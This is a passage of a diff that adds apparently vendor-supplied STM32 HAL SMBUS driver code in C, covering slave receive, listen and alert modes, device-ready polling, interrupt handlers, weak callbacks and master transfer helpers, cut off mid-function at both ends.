HOST */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + /* Note : The SMBUS interrupts must be enabled after unlocking current process + to avoid the risk of SMBUS interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_ENABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Enable the Address listen mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref SMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_Slave_Receive_IT(SMBUS_HandleTypeDef *hsmbus, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_SMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hsmbus->State == HAL_SMBUS_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsmbus); + + /* Check if the SMBUS is already enabled */ + if ((hsmbus->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + } + + /* Disable Pos */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + hsmbus->State = HAL_SMBUS_STATE_BUSY_RX_LISTEN; + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_SLAVE; + + + + /* Prepare transfer parameters */ + hsmbus->pBuffPtr = pData; + hsmbus->XferCount = Size; + hsmbus->XferOptions = XferOptions; + hsmbus->XferSize = hsmbus->XferCount; + + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + /* Note : The SMBUS interrupts must be enabled after unlocking current process + to avoid the risk of SMBUS interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_ENABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + + +/** + * @brief Enable the Address listen mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_EnableListen_IT(SMBUS_HandleTypeDef *hsmbus) +{ + if (hsmbus->State == HAL_SMBUS_STATE_READY) + { + hsmbus->State = HAL_SMBUS_STATE_LISTEN; + + /* Check if the SMBUS is already enabled */ + if ((hsmbus->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + } + + /* Enable Address Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Enable EVT and ERR interrupt */ + __HAL_SMBUS_ENABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Disable the Address listen mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_DisableListen_IT(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of tmp to prevent undefined behavior of volatile usage */ + uint32_t tmp; + + /* Disable Address listen mode only if a transfer is not ongoing */ + if (hsmbus->State == HAL_SMBUS_STATE_LISTEN) + { + tmp = (uint32_t)(hsmbus->State) & SMBUS_STATE_MSK; + hsmbus->PreviousState = tmp | (uint32_t)(hsmbus->Mode); + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + + /* Disable Address Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Disable EVT and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Enable the SMBUS alert mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUSx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_EnableAlert_IT(SMBUS_HandleTypeDef *hsmbus) +{ + /* Enable SMBus alert */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ALERT); + + /* Clear ALERT flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_SMBALERT); + + /* Enable Alert Interrupt */ + __HAL_SMBUS_ENABLE_IT(hsmbus, SMBUS_IT_ERR); + + return HAL_OK; +} +/** + * @brief Disable the SMBUS alert mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUSx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_DisableAlert_IT(SMBUS_HandleTypeDef *hsmbus) +{ + /* Disable SMBus alert */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ALERT); + + /* Disable Alert Interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_ERR); + + return HAL_OK; +} + + +/** + * @brief Check if target device is ready for communication. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param DevAddress Target device address The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param Trials Number of trials + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_IsDeviceReady(SMBUS_HandleTypeDef *hsmbus, uint16_t DevAddress, uint32_t Trials, uint32_t Timeout) +{ + uint32_t tickstart = 0U, tmp1 = 0U, tmp2 = 0U, tmp3 = 0U, SMBUS_Trials = 1U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + if (hsmbus->State == HAL_SMBUS_STATE_READY) + { + /* Wait until BUSY flag is reset */ + if (SMBUS_WaitOnFlagUntilTimeout(hsmbus, SMBUS_FLAG_BUSY, SET, SMBUS_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hsmbus); + + /* Check if the SMBUS is already enabled */ + if ((hsmbus->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + } + + /* Disable Pos */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + hsmbus->State = HAL_SMBUS_STATE_BUSY; + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->XferOptions = SMBUS_NO_OPTION_FRAME; + + do + { + /* Generate Start */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_START); + + /* Wait until SB flag is set */ + if (SMBUS_WaitOnFlagUntilTimeout(hsmbus, SMBUS_FLAG_SB, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Send slave address */ + hsmbus->Instance->DR = SMBUS_7BIT_ADD_WRITE(DevAddress); + + /* Wait until ADDR or AF flag are set */ + /* Get tick */ + tickstart = HAL_GetTick(); + + tmp1 = __HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_ADDR); + tmp2 = __HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_AF); + tmp3 = hsmbus->State; + while ((tmp1 == RESET) && (tmp2 == RESET) && (tmp3 != HAL_SMBUS_STATE_TIMEOUT)) + { + if ((Timeout == 0U) || ((HAL_GetTick() - tickstart) > Timeout)) + { + hsmbus->State = HAL_SMBUS_STATE_TIMEOUT; + } + tmp1 = __HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_ADDR); + tmp2 = __HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_AF); + tmp3 = hsmbus->State; + } + + hsmbus->State = HAL_SMBUS_STATE_READY; + + /* Check if the ADDR flag has been set */ + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_ADDR) == SET) + { + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + + /* Clear ADDR Flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + + /* Wait until BUSY flag is reset */ + if (SMBUS_WaitOnFlagUntilTimeout(hsmbus, SMBUS_FLAG_BUSY, SET, SMBUS_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + + hsmbus->State = HAL_SMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + return HAL_OK; + } + else + { + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + + /* Clear AF Flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_AF); + + /* Wait until BUSY flag is reset */ + if (SMBUS_WaitOnFlagUntilTimeout(hsmbus, SMBUS_FLAG_BUSY, SET, SMBUS_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + } + } + while (SMBUS_Trials++ < Trials); + + hsmbus->State = HAL_SMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + return HAL_ERROR; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief This function handles SMBUS event interrupt request. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +void HAL_SMBUS_EV_IRQHandler(SMBUS_HandleTypeDef *hsmbus) +{ + uint32_t sr2itflags = READ_REG(hsmbus->Instance->SR2); + uint32_t sr1itflags = READ_REG(hsmbus->Instance->SR1); + uint32_t itsources = READ_REG(hsmbus->Instance->CR2); + + uint32_t CurrentMode = hsmbus->Mode; + + /* Master mode selected */ + if (CurrentMode == HAL_SMBUS_MODE_MASTER) + { + /* SB Set ----------------------------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_SB) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_Master_SB(hsmbus); + } + /* ADD10 Set -------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_ADD10) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_Master_ADD10(hsmbus); + } + /* ADDR Set --------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_ADDR) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_Master_ADDR(hsmbus); + } + /* SMBUS in mode Transmitter -----------------------------------------------*/ + if ((sr2itflags & SMBUS_FLAG_TRA) != RESET) + { + /* TXE set and BTF reset -----------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_TXE) != RESET) && ((itsources & SMBUS_IT_BUF) != RESET) && ((sr1itflags & SMBUS_FLAG_BTF) == RESET)) + { + SMBUS_MasterTransmit_TXE(hsmbus); + } + /* BTF set -------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_BTF) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_MasterTransmit_BTF(hsmbus); + } + } + /* SMBUS in mode Receiver --------------------------------------------------*/ + else + { + /* RXNE set and BTF reset -----------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_RXNE) != RESET) && ((itsources & SMBUS_IT_BUF) != RESET) && ((sr1itflags & SMBUS_FLAG_BTF) == RESET)) + { + SMBUS_MasterReceive_RXNE(hsmbus); + } + /* BTF set -------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_BTF) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_MasterReceive_BTF(hsmbus); + } + } + } + /* Slave mode selected */ + else + { + /* ADDR set --------------------------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_ADDR) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_Slave_ADDR(hsmbus); + } + /* STOPF set --------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_STOPF) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_Slave_STOPF(hsmbus); + } + /* SMBUS in mode Transmitter -----------------------------------------------*/ + else if ((sr2itflags & SMBUS_FLAG_TRA) != RESET) + { + /* TXE set and BTF reset -----------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_TXE) != RESET) && ((itsources & SMBUS_IT_BUF) != RESET) && ((sr1itflags & SMBUS_FLAG_BTF) == RESET)) + { + SMBUS_SlaveTransmit_TXE(hsmbus); + } + /* BTF set -------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_BTF) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_SlaveTransmit_BTF(hsmbus); + } + } + /* SMBUS in mode Receiver --------------------------------------------------*/ + else + { + /* RXNE set and BTF reset ----------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_RXNE) != RESET) && ((itsources & SMBUS_IT_BUF) != RESET) && ((sr1itflags & SMBUS_FLAG_BTF) == RESET)) + { + SMBUS_SlaveReceive_RXNE(hsmbus); + } + /* BTF set -------------------------------------------------------------*/ + else if (((sr1itflags & SMBUS_FLAG_BTF) != RESET) && ((itsources & SMBUS_IT_EVT) != RESET)) + { + SMBUS_SlaveReceive_BTF(hsmbus); + } + } + } +} + +/** + * @brief This function handles SMBUS error interrupt request. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +void HAL_SMBUS_ER_IRQHandler(SMBUS_HandleTypeDef *hsmbus) +{ + uint32_t tmp1 = 0U, tmp2 = 0U, tmp3 = 0U, tmp4 = 0U; + uint32_t sr1itflags = READ_REG(hsmbus->Instance->SR1); + uint32_t itsources = READ_REG(hsmbus->Instance->CR2); + + /* SMBUS Bus error interrupt occurred ------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_BERR) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_BERR; + + /* Clear BERR flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_BERR); + + } + + /* SMBUS Over-Run/Under-Run interrupt occurred ----------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_OVR) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_OVR; + + /* Clear OVR flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_OVR); + } + + /* SMBUS Arbitration Loss error interrupt occurred ------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_ARLO) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_ARLO; + + /* Clear ARLO flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_ARLO); + } + + /* SMBUS Acknowledge failure error interrupt occurred ------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_AF) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + tmp1 = hsmbus->Mode; + tmp2 = hsmbus->XferCount; + tmp3 = hsmbus->State; + tmp4 = hsmbus->PreviousState; + + if ((tmp1 == HAL_SMBUS_MODE_SLAVE) && (tmp2 == 0U) && \ + ((tmp3 == HAL_SMBUS_STATE_BUSY_TX) || (tmp3 == HAL_SMBUS_STATE_BUSY_TX_LISTEN) || \ + ((tmp3 == HAL_SMBUS_STATE_LISTEN) && (tmp4 == SMBUS_STATE_SLAVE_BUSY_TX)))) + { + SMBUS_Slave_AF(hsmbus); + } + else + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_AF; + + /* Do not generate a STOP in case of Slave receive non acknowledge during transfer (mean not at the end of transfer) */ + if (hsmbus->Mode == HAL_SMBUS_MODE_MASTER) + { + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + + } + + /* Clear AF flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_AF); + } + } + + /* SMBUS Timeout error interrupt occurred ---------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_TIMEOUT) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_TIMEOUT; + + /* Clear TIMEOUT flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_TIMEOUT); + + } + + /* SMBUS Alert error interrupt occurred -----------------------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_SMBALERT) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_ALERT; + + /* Clear ALERT flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_SMBALERT); + } + + /* SMBUS Packet Error Check error interrupt occurred ----------------------------------*/ + if (((sr1itflags & SMBUS_FLAG_PECERR) != RESET) && ((itsources & SMBUS_IT_ERR) != RESET)) + { + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_PECERR; + + /* Clear PEC error flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_PECERR); + } + + /* Call the Error Callback in case of Error detected -----------------------*/ + if (hsmbus->ErrorCode != HAL_SMBUS_ERROR_NONE) + { + SMBUS_ITError(hsmbus); + } +} + +/** + * @brief Master Tx Transfer completed callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_MasterTxCpltCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_MasterTxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Master Rx Transfer completed callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_MasterRxCpltCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_MasterRxCpltCallback can be implemented in the user file + */ +} + +/** @brief Slave Tx Transfer completed callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_SlaveTxCpltCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_SlaveTxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Slave Rx Transfer completed callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_SlaveRxCpltCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_SlaveRxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Slave Address Match callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param TransferDirection Master request Transfer Direction (Write/Read), value of @ref SMBUS_XferOptions_definition + * @param AddrMatchCode Address Match Code + * @retval None + */ +__weak void HAL_SMBUS_AddrCallback(SMBUS_HandleTypeDef *hsmbus, uint8_t TransferDirection, uint16_t AddrMatchCode) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + UNUSED(TransferDirection); + UNUSED(AddrMatchCode); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_AddrCallback can be implemented in the user file + */ +} + +/** + * @brief Listen Complete callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_ListenCpltCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_ListenCpltCallback can be implemented in the user file + */ +} + +/** + * @brief SMBUS error callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_ErrorCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_ErrorCallback can be implemented in the user file + */ +} + +/** + * @brief SMBUS abort callback. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval None + */ +__weak void HAL_SMBUS_AbortCpltCallback(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMBUS_AbortCpltCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup SMBUS_Exported_Functions_Group3 Peripheral State, Mode and Error functions + * @brief Peripheral State and Errors functions + * +@verbatim + =============================================================================== + ##### Peripheral State, Mode and Error functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the SMBUS handle state. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval HAL state + */ +HAL_SMBUS_StateTypeDef HAL_SMBUS_GetState(SMBUS_HandleTypeDef *hsmbus) +{ + /* Return SMBUS handle state */ + return hsmbus->State; +} + +/** + * @brief Return the SMBUS Master, Slave or no mode. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL mode + */ +HAL_SMBUS_ModeTypeDef HAL_SMBUS_GetMode(SMBUS_HandleTypeDef *hsmbus) +{ + return hsmbus->Mode; +} + +/** + * @brief Return the SMBUS error code + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval SMBUS Error Code + */ +uint32_t HAL_SMBUS_GetError(SMBUS_HandleTypeDef *hsmbus) +{ + return hsmbus->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup SMBUS_Private_Functions + * @{ + */ + +/** + * @brief Handle TXE flag for Master + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_MasterTransmit_TXE(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentState = hsmbus->State; + uint32_t CurrentXferOptions = hsmbus->XferOptions; + + if ((hsmbus->XferSize == 0U) && (CurrentState == HAL_SMBUS_STATE_BUSY_TX)) + { + /* Call TxCpltCallback() directly if no stop mode is set */ + if (((CurrentXferOptions == SMBUS_FIRST_FRAME) || (CurrentXferOptions == SMBUS_NEXT_FRAME)) && (CurrentXferOptions != SMBUS_NO_OPTION_FRAME)) + { + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + hsmbus->PreviousState = SMBUS_STATE_MASTER_BUSY_TX; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->MasterTxCpltCallback(hsmbus); +#else + HAL_SMBUS_MasterTxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + else /* Generate Stop condition then Call TxCpltCallback() */ + { + /* Disable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + + hsmbus->PreviousState = HAL_SMBUS_STATE_READY; + hsmbus->State = HAL_SMBUS_STATE_READY; + + hsmbus->Mode = HAL_SMBUS_MODE_NONE; +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->MasterTxCpltCallback(hsmbus); +#else + HAL_SMBUS_MasterTxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + } + else if (CurrentState == HAL_SMBUS_STATE_BUSY_TX) + { + + if ((hsmbus->XferCount == 2U) && (SMBUS_GET_PEC_MODE(hsmbus) == SMBUS_PEC_ENABLE) && ((hsmbus->XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (hsmbus->XferOptions == SMBUS_LAST_FRAME_WITH_PEC))) + { + hsmbus->XferCount--; + } + + if (hsmbus->XferCount == 0U) + { + + /* Disable BUF interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_BUF); + + if ((SMBUS_GET_PEC_MODE(hsmbus) == SMBUS_PEC_ENABLE) && ((hsmbus->XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (hsmbus->XferOptions == SMBUS_LAST_FRAME_WITH_PEC))) + { + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_PEC); + } + + } + else + { + /* Write data to DR */ + hsmbus->Instance->DR = (*hsmbus->pBuffPtr++); + hsmbus->XferCount--; + } + } + return HAL_OK; +} + +/** + * @brief Handle BTF flag for Master transmitter + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_MasterTransmit_BTF(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hsmbus->XferOptions; + + if (hsmbus->State == HAL_SMBUS_STATE_BUSY_TX) + { + if (hsmbus->XferCount != 0U) + { + /* Write data to DR */ + hsmbus->Instance->DR = (*hsmbus->pBuffPtr++); + hsmbus->XferCount--; + } + else + { + /* Call TxCpltCallback() directly if no stop mode is set */ + if (((CurrentXferOptions == SMBUS_FIRST_FRAME) || (CurrentXferOptions == SMBUS_NEXT_FRAME)) && (CurrentXferOptions != SMBUS_NO_OPTION_FRAME)) + { + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + hsmbus->PreviousState = SMBUS_STATE_MASTER_BUSY_TX; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->MasterTxCpltCallback(hsmbus); +#else + HAL_SMBUS_MasterTxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + else /* Generate Stop condition then Call TxCpltCallback() */ + { + /* Disable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + + hsmbus->PreviousState = HAL_SMBUS_STATE_READY; + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->MasterTxCpltCallback(hsmbus); +#else + HAL_SMBUS_MasterTxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + } + } + return HAL_OK; +} + +/** + * @brief Handle RXNE flag for Master + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_MasterReceive_RXNE(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hsmbus->XferOptions; + + if (hsmbus->State == HAL_SMBUS_STATE_BUSY_RX) + { + uint32_t tmp = hsmbus->XferCount; + + if (tmp > 3U) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + + if (hsmbus->XferCount == 3) + { + /* Disable BUF interrupt, this help to treat correctly the last 4 bytes + on BTF subroutine */ + /* Disable BUF interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_BUF); + } + } + + else if (tmp == 2U) + { + + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + + if ((CurrentXferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (CurrentXferOptions == SMBUS_LAST_FRAME_WITH_PEC)) + { + /* PEC of slave */ + hsmbus->XferPEC = SMBUS_GET_PEC(hsmbus); + + } + /* Generate Stop */ + 